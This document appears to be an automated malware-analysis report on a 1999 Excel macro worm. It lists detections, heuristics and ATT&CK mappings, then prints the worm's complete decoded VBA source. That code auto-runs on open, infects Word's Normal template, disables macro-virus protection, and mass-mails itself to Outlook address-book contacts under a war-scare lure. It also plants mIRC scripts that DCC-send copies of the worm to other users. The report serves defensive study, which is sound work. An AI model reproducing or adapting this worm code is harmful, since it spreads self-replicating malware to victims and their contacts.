MALICIOUS
396
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a macro-enabled Excel file containing VBA code that exhibits self-replication and worm-like behavior. It attempts to create directories, modifies Excel settings, and uses VBA functions like CreateObject and GetObject, indicative of malicious intent. The VBA code explicitly mentions 'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC' and includes functionality to harvest recipients from the MAPI address book and send itself as an email attachment, aligning with spearphishing attachment tactics.
Heuristics 9
-
ClamAV: Xls.Trojan.War-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.War-1
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NT.DeleteLines 1, NT.CountOfLines -
VBA email-worm self-replication (Outlook mass-mailer) critical OLE_VBA_EMAIL_WORM_SELF_REPLICATIONVBA macro drives Outlook to mass-mail itself: it automates Outlook.Application, programmatically creates a mail item, and spreads by harvests recipients from the MAPI address book / inbox, attaches a file to the outgoing message, sends the message programmatically. Harvesting recipients from the address book / inbox and auto-attaching the carrier to outgoing messages is the defining behavior of the Melissa / LoveLetter / W97M mass-mailer worm lineage — there is no benign document use, independent of any AV signature.Matched line in script
Set alevirusscs = oa.CreateItem(0) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set WordObj = CreateObject("Word.Application") -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set WordObj = GetObject(, "Word.Application") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub Auto_Close()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11406 bytes |
SHA-256: 3ad0a0bc52a89476de753c46b64b138aecb604cad131c05ca9556783fd99ae2d |
|||
|
Detection
ClamAV:
Xls.Trojan.War-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Email"
'Primeiro Excel Virus Brasileiro Para Excel97 e Email e MIRC
'AlevirusS>C>S 1999!!
Sub Auto_Open()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = 0
Call Email
Call Estupro
Call Mirc
Call Dia
MkDir "c:\Arquivos de programas\Microsoft Office\Office\XLINICIO"
MkDir "c:\Programs Files\Microsoft Office\Office\XLINICIO"
Application.ScreenUpdating = 0
Application.DisplayAlerts = 0
If Tudo() Then
GoTo SejaGay:
Else
NoOlho
End If
SejaGay:
Application.OnSheetActivate = "ALEVIRUSCS.XLM!Puta"
fui:
End Sub
Function Tudo() As Boolean
Tudo = False
For x = 1 To Application.Workbooks.Count
If Application.Workbooks(x).Name = "ALEVIRUSCS.XLM" Then
For y = 1 To Application.Workbooks("ALEVIRUSCS.XLM").Modules.Count
If Application.Workbooks("ALEVIRUSCS.XLM").Modules(y).Name = "Email" Then
Tudo = True
End If
Next y
End If
Next x
End Function
Function NoOlho()
activebook = ActiveWorkbook.Name
Workbooks(activebook).SaveCopyAs Application.StartupPath + "\ALEVIRUSCS.XLM"
Workbooks.Open (Application.StartupPath + "\ALEVIRUSCS.XLM")
Windows("ALEVIRUSCS.XLM").Visible = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
End Function
Function Amerda() As Boolean
activebook = ActiveWorkbook.Name
Amerda = False
For y = 1 To Application.Workbooks(activebook).Modules.Count
If Application.Workbooks(activebook).Modules(y).Name = "Email" Then
Amerda = True
End If
Next y
End Function
Sub Puta()
oactivebook = ActiveWorkbook.Name
If Amerda() Then
GoTo cya
Else
End If
Application.ScreenUpdating = False
Application.Windows("ALEVIRUSCS.XLM").Visible = True
Workbooks("ALEVIRUSCS.XLM").Activate
Sheets("Email").Visible = True
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Copy Before:=Workbooks(oactivebook).Sheets(1)
Workbooks(oactivebook).Sheets("Email").Visible = False
Workbooks("ALEVIRUSCS.XLM").Sheets("Email").Visible = False
Windows("ALEVIRUSCS.XLM").Visible = False
cya:
Close
End Sub
Sub Auto_Close()
On Error Resume Next
Application.DisplayAlerts = False
Application.Workbooks("ALEVIRUSCS.XLM").Save
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\WAR3.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\SEXO.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\FONE.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\AVP.XLS"
ActiveWorkbook.SaveCopyAs "C:\WINDOWS\CAIXA.XLS"
Call Dia
End Sub
Private Sub Estupro()
On Error Resume Next
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
Quit = True
End If
Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
If InStr(1, NT.Lines(1, 1), "'AlevirusSCS<>EMAIL<>Excel<>Virus<>BRASIL<>1999!") Then
WordObj.Run "Normal.ThisDocument.AutoExec"
Else
WordObj.Options.SaveNormalPrompt = False
NT.DeleteLines 1, NT.CountOfLines
NT.InsertLines 1, "Sub AutoExec()"
NT.InsertLines 2, "On Error Resume Next"
NT.InsertLines 3, "Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)"
NT.InsertLines 4, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 5, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 6, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 7, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 8, "System.ProfileString(""Options"", ""EnableMacroVirusProtection"") = ""0"""
NT.InsertLines 9, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 10, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 11, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 12, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 13, "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 14, "WordBasic.MkDir ""c:\Alevirus99"""
NT.InsertLines 15, "WordBasic.CopyFile ""c:\windows\win.com"", ""c:\Alevirus99\win.com"""
NT.InsertLines 16, "WordBasic.Kill ""c:\Alevirus99\*.*"""
NT.InsertLines 17, "WordBasic.RmDir ""c:\Alevirus99"""
NT.InsertLines 18, "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """""
NT.InsertLines 19, "End Sub"
WordObj.Run "Normal.ThisDocument.AutoExec"
End If
Set NT = Nothing
If Quit = True Then WordObj.Quit
End Sub
Private Sub Email()
On Error Resume Next
Application.EnableCancelKey = 0
Randomize
Set oa = CreateObject("Outlook.Application")
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
Set mn = oa.GetNameSpace("MAPI")
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
If oa = "Outlook" Then
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
mn.Logon "profile", "password"
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
For y = 1 To mn.AddressLists.Count
WordBasic.MkDir "c:\Alevirus99"
WordBasic.CopyFile "c:\windows\win.com", "c:\Alevirus99\win.com"
WordBasic.Kill "c:\Alevirus99\*.*"
WordBasic.RmDir "c:\Alevirus99"
x = 1
Set ab = mn.AddressLists(y)
Set alevirusscs = oa.CreateItem(0)
For z = 1 To ab.AddressEntries.Count
vi = ab.AddressEntries(x)
alevirusscs.Recipients.Add vi
x = x + 1
If x > 60 Then z = ab.AddressEntries.Count
Next z
alevirusscs.Subject = "Fwd: Millions DEADS!!!"
alevirusscs.Body = "Urgent info inside. The III War is Begin!!! Read The Secret's in XLS!"
alevirusscs.Attachments.Add ActiveWorkbook.FullName
alevirusscs.Send
vi = ""
Next y
mn.Logoff
End If
End Sub
Private Sub Dia()
If Day(Now()) = 19 And Month(Now()) = 5 Then
Assistant.Visible = True
With Assistant.NewBalloon
.Animation = msoAnimationGetAttentionMajor
.Heading = "Atençăo:"
.Text = "Primeiro Excel97>Email>MIRC> Virus Brasileiro by AlevirusSCS [Brasil]1999!Em Breve Alevirus Excel97 Formula Virus!Mande-me Um EMAIL!fernanda88@hotmail.com"
.Icon = msoIconAlert
.Show
End With
End If
End Sub
Private Sub Mirc()
On Error Resume Next
Open "c:\mirc\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\war3.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja40\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\sexo.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja41\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\fone.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja38\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\avp.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\ninja37\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\mirc40\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\fone.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\mirc41\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\avp.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\dusk\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\darkskie\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\war3.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\darksk~1\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\sexo.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\matchbox\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\hell31s\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\avala8\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\nep\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
Open "c:\nep45\script.ini" For Output As 1
Print #1, "[script]"
Print #1, "n0; AlevirusS>C>S WAR III Excel97>Email>MIRC Virus Brasil! 1999!"
Print #1, "n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }"
Print #1, "n2= /dcc send $nick c:\windows\caixa.xls"
Print #1, "n3=}"
Print #1, "n4=}"
Close 1
End Sub
Sub ViewVBCode()
MsgBox "Este programa executou uma instrucao ilegal por favor feche o Windows e reinicie.", vbCritical, "Microsoft Word"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.